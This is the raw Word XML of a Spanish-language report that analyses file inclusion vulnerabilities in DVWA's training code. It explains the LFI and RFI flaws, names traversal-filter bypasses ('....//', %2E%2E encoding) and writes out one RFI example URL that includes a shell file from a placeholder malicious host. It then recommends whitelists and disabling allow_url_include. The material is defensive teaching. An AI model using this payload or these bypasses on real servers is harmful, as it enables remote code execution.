          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> los archivos críticos no sean accesibles desde la web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D9F5B1" w14:textId="77777777" w:rsidR="008C0D19" w:rsidRPr="001872EF" w:rsidRDefault="008C0D19" w:rsidP="008C0D1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8518E5" w14:textId="4E1F156F" w:rsidR="001872EF" w:rsidRPr="00651C2A" w:rsidRDefault="00423A7E" w:rsidP="00415A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51C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de Código extraído de DVWA, de </w:t>
      </w:r>
      <w:r w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NIVEL MEDIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2BA104" w14:textId="15D703F7" w:rsidR="009E370B" w:rsidRDefault="009E370B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BFE415" wp14:editId="5E3454A0">
            <wp:extent cx="5400040" cy="1382233"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="89684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0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878" cy="13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4AAE" w14:textId="16AF16AA" w:rsidR="006866E5" w:rsidRPr="008E69CD" w:rsidRDefault="008E69CD" w:rsidP="008C0D19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8E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">.- </w:t>
      </w:r>
      <w:r w:rsidR="008C0D19" w:rsidRPr="008E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D0375F" w14:textId="699CAC0F" w:rsidR="008C0D19" w:rsidRPr="008C0D19" w:rsidRDefault="008C0D19" w:rsidP="005B069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nicio y cierre del documento PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEABD6" w14:textId="036CD046" w:rsidR="006866E5" w:rsidRDefault="00E139E3" w:rsidP="005B069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script obtiene el valor de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trada del usuario del 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ámetr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'page' de la URL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 la web, asignándose directamente a la variable sin validación inicial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803AAAB" w14:textId="401A0970" w:rsidR="0015488D" w:rsidRDefault="00E139E3" w:rsidP="0015488D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Finalmente el código intenta eliminar </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B6C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atrones peligrosos, por un lado elimina el posible reemplazo de “http/s://” previniendo ataques RFI; y por otro los caracteres </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AC7B6C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“..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AC7B6C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/”, “..\” evitando la navegación de directorios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AC7B6C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ediante ataques “Path Traversal”</w:t>
      </w:r>
      <w:r w:rsidR="0015488D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7204B177" w14:textId="430F89C4" w:rsidR="006866E5" w:rsidRPr="008E69CD" w:rsidRDefault="008E69CD" w:rsidP="001548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2.3.2.- </w:t>
      </w:r>
      <w:r w:rsidR="0015488D" w:rsidRPr="008E69CD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Problemas de seguridad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE9BF3" w14:textId="4B3E23D1" w:rsidR="0015488D" w:rsidRDefault="006866E5" w:rsidP="005E68F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ción de entrada insuficiente</w:t>
      </w:r>
      <w:r w:rsid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en el uso de “</w:t>
      </w:r>
      <w:r w:rsidR="0015488D" w:rsidRPr="0015488D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str_replace ()</w:t>
      </w:r>
      <w:r w:rsidR="0015488D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="0040509C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, </w:t>
      </w:r>
      <w:r w:rsidR="0040509C" w:rsidRP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o cual seri acertado para URLs externas o saneamiento de entradas de usuario. Sin embargo, este filtrado básico podría ser eludido con el uso por el atacante de URLs codificadas</w:t>
      </w:r>
      <w:r w:rsidR="0040509C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</w:p>
    <w:p w14:paraId="798E9502" w14:textId="77777777" w:rsidR="0040509C" w:rsidRDefault="006866E5" w:rsidP="0040509C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 xml:space="preserve">Un atacante podría usar variaciones como </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRP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"....</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRP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//"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o codificación URL</w:t>
      </w:r>
      <w:r w:rsid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mediante el reemplazo por sus valores ASCII </w:t>
      </w:r>
      <w:r w:rsidR="0040509C" w:rsidRPr="0040509C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( / -&gt; %2F, .. -&gt; %2E%2E)</w:t>
      </w:r>
      <w:r w:rsid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con la finalidad de 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vadir esta protección.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B4A555" w14:textId="7C7629FB" w:rsidR="006866E5" w:rsidRDefault="006866E5" w:rsidP="0015488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script no verifica si el archivo solicitado</w:t>
      </w:r>
      <w:r w:rsid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 la entrada </w:t>
      </w:r>
      <w:r w:rsidR="0040509C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á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o no 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n una lista de archivos permitidos</w:t>
      </w:r>
      <w:r w:rsidR="0040509C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lista blanca), pudiendo incluir el archivo sin más comprobaciones</w:t>
      </w:r>
      <w:r w:rsid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pudiendo un atacante realizar ataques FLI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DEBA27" w14:textId="34C57096" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="0015488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alta de sa</w:t>
      </w:r>
      <w:r w:rsid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eamiento de la salida y en el manejo de errores, con lo que podría ser vulnerable a ataques XSS con inclusión de código malicioso, y no previene situaciones </w:t>
      </w:r>
      <w:r w:rsidR="00C21F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(</w:t>
      </w:r>
      <w:r w:rsidR="00C21FD5" w:rsidRPr="00C21F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 except/try”)</w:t>
      </w:r>
      <w:r w:rsidR="00C21F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r w:rsid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onde el archivo no existe o no es accesible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D12BC" w14:textId="16C5EFE2" w:rsidR="006866E5" w:rsidRPr="00E561F8" w:rsidRDefault="00E561F8" w:rsidP="00C21FD5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2.3.4.- </w:t>
      </w:r>
      <w:r w:rsidR="006866E5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Recomendaciones de Mejora</w:t>
      </w:r>
      <w:r w:rsidR="00C21FD5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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A248B1" w14:textId="0DC1C204" w:rsidR="006B3B2B" w:rsidRDefault="00C21FD5" w:rsidP="00B36732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u</w:t>
      </w:r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 rango más amplio de patrones potencialmente malintencionados, como caracteres codificados, esquemas inusuales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(file:/// </w:t>
      </w:r>
      <w:r w:rsidR="006B3B2B" w:rsidRP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sym w:font="Wingdings" w:char="F0E0"/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http:// o https:// o ftp</w:t>
      </w:r>
      <w:r w:rsidR="006B3B2B" w:rsidRP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//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o sftp</w:t>
      </w:r>
      <w:r w:rsidR="006B3B2B" w:rsidRP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//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="006B3B2B" w:rsidRP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ata:/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006B3B2B" w:rsidRPr="00C21F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/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o</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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xtensiones de archivo sospechosas</w:t>
      </w:r>
      <w:r w:rsid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.php o .exe </w:t>
      </w:r>
      <w:r w:rsidR="006B3B2B"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sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsid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.txt o .jpg, y .htaccess o .config) para acceder a archivos del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10707BB3" w14:textId="0B88D0AA" w:rsidR="00C21FD5" w:rsidRPr="006B3B2B" w:rsidRDefault="00C21FD5" w:rsidP="00B36732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</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3B2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 validación debe considerar el contexto en el que se está utilizando la entrada para asegurarse de que se ajuste al formato esperado y no suponga un riesgo para el sistema</w:t>
      </w:r>
      <w:r w:rsidR="008D59A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es decir cuando se procesa una solicitud de archivo o una solicitud de acceso a una BBDD, deben ser verificada si los formatos son permitidos y no contienen patrones malintencionados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A735D" w14:textId="032F49A1" w:rsidR="006866E5" w:rsidRPr="00467A0F" w:rsidRDefault="006866E5" w:rsidP="00467A0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finir un array de archivos permitidos y verificar si la entrada del usuario coincide con uno de </w:t>
      </w:r>
      <w:r w:rsidR="00467A0F"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s</w:t>
      </w:r>
      <w:r w:rsidR="00467A0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lista blanca)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D89831" w14:textId="6FF31D43" w:rsidR="006866E5" w:rsidRDefault="00C73125" w:rsidP="0015488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</w:t>
      </w:r>
      <w:r w:rsidR="006866E5"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ar expresiones regulares o funciones de filtrado de PHP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 filtrado </w:t>
      </w:r>
      <w:r w:rsidR="0072682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á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robustas como, por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906692F" w14:textId="1C290762" w:rsidR="00C73125" w:rsidRDefault="00C73125" w:rsidP="00C73125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C7312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6D0D09F3" wp14:editId="4A397133">
            <wp:extent cx="4950662" cy="1208598"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1315818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8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527" cy="12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A0D1" w14:textId="1AB6527C" w:rsidR="00C73125" w:rsidRPr="006866E5" w:rsidRDefault="00C73125" w:rsidP="00726825">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="696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 xml:space="preserve">Si la solicitud de entrada está dentro de los patrones maliciosos no </w:t>
      </w:r>
      <w:r w:rsidR="0072682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validará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 entrada y en caso contrario </w:t>
      </w:r>
      <w:r w:rsidR="0072682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jará pasarla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84A3C3" w14:textId="444275F9" w:rsidR="006866E5" w:rsidRPr="00E561F8" w:rsidRDefault="00E561F8" w:rsidP="00C7312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2.3.5.- </w:t>
      </w:r>
      <w:r w:rsidR="006866E5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Ejemplo de Mejora</w:t>
      </w:r>
      <w:r w:rsidR="00726825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 de código</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DF8380" w14:textId="64598745" w:rsidR="00FF3339" w:rsidRPr="0015488D" w:rsidRDefault="00FF3339" w:rsidP="00FF333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FF33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59A73D1A" wp14:editId="28556F49">
            <wp:extent cx="5229447" cy="2413591"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1418912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2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125" cy="24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8727" w14:textId="77777777" w:rsidR="00FF3339" w:rsidRDefault="006866E5" w:rsidP="00FF333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e enfoque mejorado utiliza una lista blanca de archivos permitidos, usa rutas absolutas, y maneja </w:t>
      </w:r>
      <w:r w:rsidR="00FF33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os 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asos de error, proporcionando una solución mucho más segura contra ataques LFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318FF21" w14:textId="28E23E1C" w:rsidR="001872EF" w:rsidRPr="00FF3339" w:rsidRDefault="009E47DE" w:rsidP="00FF333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</w:pPr>
      <w:r w:rsidRPr="00FF3339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 xml:space="preserve">3.- </w:t>
      </w:r>
      <w:r w:rsidR="001A1D47" w:rsidRPr="00FF3339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 xml:space="preserve">VULNERABILIDAD DE INCLUSIÓN DE ARCHIVOS REMOTOS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61006B14" w14:textId="22A364F8" w:rsidR="001872EF" w:rsidRPr="008E69CD" w:rsidRDefault="001872EF" w:rsidP="00FF333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</w:pPr>
      <w:r w:rsidRPr="008E69CD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 xml:space="preserve">3.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E561F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r w:rsidR="001A1D47" w:rsidRPr="00E561F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RFI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6966CC" w14:textId="77777777" w:rsidR="001872EF" w:rsidRDefault="001872EF" w:rsidP="00FF3339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a vulnerabilidad de inclusión de archivos remotos (RFI) permite a un atacante incluir archivos remotos en la aplicación web, lo que puede llevar a la ejecución de código malicioso en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037D8D60" w14:textId="38C7D922" w:rsidR="00FF3339" w:rsidRPr="00651C2A" w:rsidRDefault="00FF3339" w:rsidP="00FF333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561F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E561F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3339">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de Código extraído de DVWA, de </w:t>
      </w:r>
      <w:r w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NIVEL BAJO</w:t>
      </w:r>
      <w:r w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8A96A" w14:textId="14E18815" w:rsidR="00FF3339" w:rsidRDefault="00FF3339" w:rsidP="00FF3339">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center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2E4E85" wp14:editId="26FE11E2">
            <wp:extent cx="5400040" cy="1252064"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1470876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CB02" w14:textId="35EC1426" w:rsidR="004370AF" w:rsidRDefault="004370AF" w:rsidP="00951759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La explicación es igual del código ya se ha explicado anteriormente, destacando que es un archivo PHP que obtiene el valor de entrada de la URL con el parámetro “page” y le asigna un valor a la variable $file, sin ninguna medida de validación ni control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299762F6" w14:textId="50533174" w:rsidR="004370AF" w:rsidRPr="00E561F8" w:rsidRDefault="00E561F8" w:rsidP="0095175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3.2.1.- </w:t>
      </w:r>
      <w:r w:rsidR="004370AF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Riesgos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBBE337" w14:textId="33F268BC" w:rsidR="004370AF" w:rsidRPr="004370AF" w:rsidRDefault="004370AF" w:rsidP="00951759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uso de $_GET['page'] directamente en la inclusión de archivo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ermite a un atacante acceder a archivos que no deberían ser accesibles desde fuera del sitio web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056ED71A" w14:textId="0130D110" w:rsidR="004370AF" w:rsidRDefault="004370AF" w:rsidP="00951759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 atacante puede incluir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n archivo remoto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que contiene código PHP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alicioso, el cual,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ejecutará en el contexto de tu sitio web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787287E7" w14:textId="7A456430" w:rsidR="004370AF" w:rsidRPr="004370AF" w:rsidRDefault="00E561F8" w:rsidP="00951759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3.2.2.- </w:t>
      </w:r>
      <w:r w:rsidR="004370AF" w:rsidRPr="004370AF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Recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD4A96B" w14:textId="33509950" w:rsidR="004370AF" w:rsidRPr="004370AF" w:rsidRDefault="004370AF" w:rsidP="00951759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ción y saneamiento de la entrada: Antes de incluir un archivo, asegúrate de que la entrada sea válida y no contenga patrones malintencionado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como se ha comentado anteriormente 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lista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blancas, inclusión de comandos prohibidos, manejo de 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rrores.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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE6C0A6" w14:textId="37CAA0DD" w:rsidR="004370AF" w:rsidRDefault="004370AF" w:rsidP="00951759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vitar el uso de </w:t>
      </w:r>
      <w:r w:rsidR="00FF2F0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_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GET</w:t>
      </w:r>
      <w:r w:rsidR="00FF2F0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</w:t>
      </w:r>
      <w:r w:rsidR="00FF2F0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_POST directamente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rea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una variable intermedia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donde se </w:t>
      </w:r>
      <w:r w:rsidR="00951759"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plique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edidas de </w:t>
      </w:r>
      <w:r w:rsidR="00951759"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ción</w:t>
      </w:r>
      <w:r w:rsidRPr="004370AF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saneamientos necesarios antes de incluir el archivo</w:t>
      </w:r>
      <w:r w:rsid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mo, por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DD6BF" w14:textId="76021BA3" w:rsidR="008E69CD" w:rsidRDefault="008E69CD" w:rsidP="008E69CD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E69C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49EB20B2" wp14:editId="4397232C">
            <wp:extent cx="5185802" cy="3125972"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1467184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4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911" cy="3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97A3" w14:textId="77777777" w:rsidR="00951759" w:rsidRPr="00951759" w:rsidRDefault="00951759" w:rsidP="00951759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 xml:space="preserve">Como se puede observar, se crea una función que sanea y valida los caracteres antes de llegar a la función de asignación de la variable </w:t>
      </w:r>
      <w:r w:rsidRPr="00951759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page</w:t>
      </w:r>
      <w:r w:rsidRP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1E796BE9" w14:textId="108FB910" w:rsidR="004370AF" w:rsidRPr="00E561F8" w:rsidRDefault="00E561F8" w:rsidP="00951759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 xml:space="preserve">3.2.3.- </w:t>
      </w:r>
      <w:r w:rsidR="004370AF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Ejemplo de mejora del código para evitar RFI</w:t>
      </w:r>
      <w:r w:rsidR="00951759" w:rsidRPr="00E561F8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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C2930" w14:textId="32BF2CD7" w:rsidR="00951759" w:rsidRPr="00951759" w:rsidRDefault="00951759" w:rsidP="0095175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95175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6B27FF68" wp14:editId="04111A1A">
            <wp:extent cx="5356225" cy="2838893"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129499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90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314" cy="28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2A82" w14:textId="62BD998B" w:rsidR="00FF3339" w:rsidRDefault="00FF3339" w:rsidP="00FF333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3339">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3339">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3339">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3339">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de Código extraído de DVWA, de </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3339">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">NIVEL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MEDIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3339">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E391F" w14:textId="45C542D5" w:rsidR="001872EF" w:rsidRDefault="00FF3339" w:rsidP="00E561F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B35044" wp14:editId="70D0FFF6">
            <wp:extent cx="5400040" cy="1381760"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1588174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0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F501" w14:textId="32AF3C33" w:rsidR="00E561F8" w:rsidRDefault="00E561F8" w:rsidP="00E561F8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61F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.2.1.- Explicación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2DA5F" w14:textId="511C6D07" w:rsidR="00E561F8" w:rsidRDefault="00E561F8" w:rsidP="00E561F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Como ya se ha explicado anteriormente, este código presenta vulnerabilidades, ya que realiza una validación y filtrado de entrada muy básico, </w:t>
      </w:r>
      <w:r w:rsidR="00E43B22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>pudiendo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser explotado</w:t>
      </w:r>
      <w:r w:rsidR="00E43B22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> por diferentes caracteres, incluso con el envío de código PHP malicioso, que puede ser ejecutado remotamente por parte de un atacante, como, por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3896DBB1" w14:textId="66823649" w:rsidR="001872EF" w:rsidRDefault="00E43B22" w:rsidP="00E43B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      </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="0028358E"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eastAsia="es-ES"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>http://example.com/index.php?page=http://malicious.com/shell.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="358499B3" w14:textId="5DDC3858" w:rsidR="001872EF" w:rsidRPr="00E43B22" w:rsidRDefault="001872EF" w:rsidP="00E43B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</w:pPr>
      <w:r w:rsidRPr="00E43B22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lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00E43B22" w:rsidRPr="00E43B22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2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43B22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B092E2A" w14:textId="7DB9D00C" w:rsidR="001872EF" w:rsidRDefault="001872EF" w:rsidP="004751A3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shabilitar la opción </w:t>
      </w:r>
      <w:r w:rsidR="00E43B22" w:rsidRPr="00E43B22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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E43B22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allow_url_include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E43B22" w:rsidRPr="00E43B22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 la configuración de PHP: </w:t>
      </w:r>
      <w:r w:rsidR="00E43B22"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 una </w:t>
      </w:r>
      <w:r w:rsidR="00E43B22"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irectiva de configuración de PHP que permite o prohíbe la inclusión de archivos remotos en un script PHP. Si está habilitado, un atacante podría incluir un archivo remoto malicioso y ejecutar código arbitrario en el servidor. Por lo tanto, es una buena práctica deshabilitar esta </w:t>
      </w:r>
      <w:r w:rsidR="00775908"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figuración para</w:t>
      </w:r>
      <w:r w:rsidR="00E43B22" w:rsidRPr="00E43B2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vitar posibles vulnerabilidades de seguridad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C3C8EB9" w14:textId="77777777" w:rsidR="00C41713" w:rsidRDefault="00C41713" w:rsidP="00C41713">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista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6365DF5" w14:textId="62FA962D" w:rsidR="00775908" w:rsidRPr="00775908" w:rsidRDefault="00775908" w:rsidP="00775908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42602DB7" wp14:editId="1D9133AF">
            <wp:extent cx="5692296" cy="2222205"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="1515471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71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540" cy="22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0FE" w14:textId="77777777" w:rsidR="00775908" w:rsidRPr="00E43B22" w:rsidRDefault="00775908" w:rsidP="00775908">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista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A3CCC55" w14:textId="0C3ADE33" w:rsidR="001872EF" w:rsidRPr="00775908" w:rsidRDefault="001872EF" w:rsidP="00775908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r y san</w:t>
      </w:r>
      <w:r w:rsidR="00775908"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a</w:t>
      </w:r>
      <w:r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 todas las entradas del usuario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para que </w:t>
      </w:r>
      <w:r w:rsidR="00775908"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olo</w:t>
      </w:r>
      <w:r w:rsidRP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e puedan incluir archivos permitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3977D93B" w14:textId="1955B1AF" w:rsidR="001872EF" w:rsidRPr="0015488D" w:rsidRDefault="001872EF" w:rsidP="00E43B2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tilizar listas blanca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, para p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rmitir solo archivos específicos que sean seguros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D58C0B" w14:textId="77777777" w:rsidR="001872EF" w:rsidRDefault="001872EF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4C7270A1" w14:textId="77777777" w:rsidR="00C41713" w:rsidRDefault="00C41713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065F3381" w14:textId="77777777" w:rsidR="00C41713" w:rsidRDefault="00C41713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0BBAA0A5" w14:textId="77777777" w:rsidR="00C41713" w:rsidRDefault="00C41713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64EF8381" w14:textId="77777777" w:rsidR="00C41713" w:rsidRDefault="00C41713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11486FD6" w14:textId="77777777" w:rsidR="00C41713" w:rsidRPr="0015488D" w:rsidRDefault="00C41713" w:rsidP="00FF3339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2C6A5325" w14:textId="5DFF7A9D" w:rsidR="001872EF" w:rsidRPr="00775908" w:rsidRDefault="001872EF" w:rsidP="00FF3339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</w:pPr>
      <w:r w:rsidRPr="00775908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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00775908" w:rsidRPr="00775908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CONCLUSI</w:t>
      </w:r>
      <w:r w:rsidR="00276D9E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ÓN</w:t>
      </w:r>
    </w:p>
